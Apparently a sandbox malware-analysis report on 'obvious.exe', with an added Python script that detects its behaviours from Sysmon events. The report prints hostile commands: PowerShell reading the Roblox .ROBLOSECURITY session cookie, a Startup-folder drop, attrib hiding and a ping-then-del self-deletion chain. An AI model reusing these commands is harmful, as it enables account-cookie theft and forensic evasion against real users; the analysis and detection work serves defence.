                        Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\obvious.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: obvious.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: obvious.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: obvious.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                        Data Obfuscation

                        Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: obvious.exe Static PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                        Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BAD00BD pushad ; iretd 0_2_00007FFD9BAD00C1
                        Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BCA69E1 push edx; retf 0_2_00007FFD9BCA73AB
                        Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BCA6E43 push edx; retf 0_2_00007FFD9BCA73AB
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9B98D2A5 pushad ; iretd 5_2_00007FFD9B98D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9BAA8ACC push edx; iretd 5_2_00007FFD9BAA8AEA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9BAA8ABC push eax; iretd 5_2_00007FFD9BAA8ACA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9BB72316 push 8B485F94h; iretd 5_2_00007FFD9BB7231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD9BAB19BA pushad ; ret 8_2_00007FFD9BAB19C9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD9BB81532 pushad ; ret 10_2_00007FFD9BB81551
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFD9BAC25F4 push cs; retf 15_2_00007FFD9BAC2662
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFD9BAC285A pushad ; retf 15_2_00007FFD9BAC2882
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFD9BAC34FA pushfd ; retf 15_2_00007FFD9BAC3512
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFD9BAC28AC pushad ; retf 15_2_00007FFD9BAC28C9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAC2604 push cs; retf 23_2_00007FFD9BAC2672
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAC276C push esi; retf 23_2_00007FFD9BAC2862
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAC276C pushad ; retf 23_2_00007FFD9BAC2892
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAC27A4 pushad ; retf 23_2_00007FFD9BAC2892
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAC34FA pushfd ; retf 23_2_00007FFD9BAC3522
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAC28D3 pushad ; retf 23_2_00007FFD9BAC28D9

                        Persistence and Installation Behavior

                        Source: C:\Users\user\Desktop\obvious.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr
                        Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe"

                        Boot Survival

                        Source: C:\Users\user\Desktop\obvious.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr (dropped file; reported three times)
                        Source: C:\Users\user\Desktop\obvious.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr\:Zone.Identifier:$DATA (Zone.Identifier alternate data stream, i.e. the mark-of-the-web on the dropped file)
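The Startup-folder drop, the attrib +h +s on the dropper and (under "Hooking and other Techniques" below) the cmd.exe ping-then-del self-deletion chain are the behaviours a host-based detection would correlate from Sysmon process-creation (Event ID 1), file-creation (Event ID 11) and alternate-data-stream (Event ID 15) records. The Python below is an added example for this page, not code from the Joe Sandbox report or from the sample; the event records are constructed to mirror the command lines and paths reported above, the field names (EventID, CommandLine, TargetFilename) assume Sysmon's schema, and every function, constant and tag name is the example's own.

```python
"""Triage Sysmon-style events for the persistence and anti-forensic behaviour
this report lists: an executable dropped into a Startup folder, attrib +h on the
dropper, and a cmd.exe 'ping/timeout && del' delayed self-deletion chain.

Added example; the sample events below are constructed, not taken from a real log."""
import ntpath
import re

# Per-machine (ProgramData) and per-user (AppData\Roaming) Startup folders both
# end in this path fragment.
STARTUP_DIR_RE = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
# Extensions that execute directly from Startup; .lnk is normal there and is
# deliberately not listed to avoid flagging ordinary application shortcuts.
RISKY_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js",
             ".jse", ".wsf", ".hta", ".ps1"}
# attrib[.exe] <+/-flags...> <target>, with or without surrounding quotes.
ATTRIB_RE = re.compile(
    r'attrib(?:\.exe)?"?\s+(?P<flags>(?:[+-][a-z]\s+)+)"?(?P<target>[^"]+)"?',
    re.IGNORECASE)
# A delay (ping or timeout) chained with && into del: the classic self-delete.
SELF_DELETE_RE = re.compile(
    r"\b(?:ping|timeout)\b[^&]*&&\s*del\b(?P<args>[^&]*)", re.IGNORECASE)
# file:stream[:$DATA], tolerating the "\:" rendering some sandboxes emit.
ADS_RE = re.compile(
    r"^(?P<file>[A-Za-z]:\\[^:]+?)\\?:(?P<stream>[^:]+)(?::\$DATA)?$")


def norm(path):
    """Windows paths are case-insensitive; normalise before correlating."""
    return path.strip().lower()


def classify_process(cmdline):
    """Return (tag, target_path) pairs found in one process command line."""
    hits = []
    m = ATTRIB_RE.search(cmdline)
    if m:
        flags = set(m.group("flags").lower().split())
        if "+h" in flags:  # +s alone is not hiding; +h is the signal
            hits.append(("attrib_hide", m.group("target").strip()))
    m = SELF_DELETE_RE.search(cmdline)
    if m:
        args = m.group("args")
        quoted = re.findall(r'"([^"]+)"', args)
        # Quoted path if present, else the last token of the del arguments.
        target = quoted[-1] if quoted else (args.split() or [""])[-1]
        hits.append(("delayed_delete", target))
    return hits


def classify_file(path):
    """Return (tag, file_path) pairs for a file or stream creation path."""
    hits = []
    ads = ADS_RE.match(path)
    base = ads.group("file") if ads else path
    if STARTUP_DIR_RE.search(base):
        if not ads and ntpath.splitext(base)[1].lower() in RISKY_EXT:
            hits.append(("startup_executable", base))
        if ads and ads.group("stream").lower() == "zone.identifier":
            hits.append(("startup_motw", base))  # mark-of-the-web written
    return hits


def triage(events):
    """Tag each event and correlate attrib +h with a delayed del of the same file."""
    findings = []
    for idx, ev in enumerate(events):
        if ev.get("EventID") == 1:
            hits = classify_process(ev.get("CommandLine", ""))
        elif ev.get("EventID") in (11, 15):
            hits = classify_file(ev.get("TargetFilename", ""))
        else:
            hits = []
        findings.extend((idx, tag, target) for tag, target in hits)
    hidden = {norm(t) for _, tag, t in findings if tag == "attrib_hide"}
    deleted = {norm(t) for _, tag, t in findings if tag == "delayed_delete"}
    correlations = [("hide_then_self_delete", p) for p in sorted(hidden & deleted)]
    return {"findings": findings, "correlations": correlations}


# Constructed sample events; command lines and paths mirror this report.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\attrib.exe",
     "CommandLine": r'"attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe"'},
    {"EventID": 11, "TargetFilename":
     r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr"},
    {"EventID": 15, "TargetFilename":
     r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr:Zone.Identifier"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pause'},
    # Benign controls: a read-only flag change and an ordinary Startup shortcut.
    {"EventID": 1, "CommandLine": r'attrib -r "C:\Users\user\notes.txt"'},
    {"EventID": 11, "TargetFilename":
     r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk"},
]

if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for finding in result["findings"]:
        print(finding)
    print(result["correlations"])
```

The correlation step is the part worth keeping in a real rule: attrib +h on its own and a ping-then-del chain on its own each occur in legitimate scripts, but both applied to the same freshly executed binary, alongside a non-shortcut executable appearing in a Startup folder, is the dropper pattern this report shows.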

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 times)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 times)
                        Source: C:\Users\user\Desktop\obvious.exe | Process created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pause (reported twice; ping delays the delete until the parent has exited)
                        Source: C:\Users\user\Desktop\obvious.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\Desktop\obvious.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
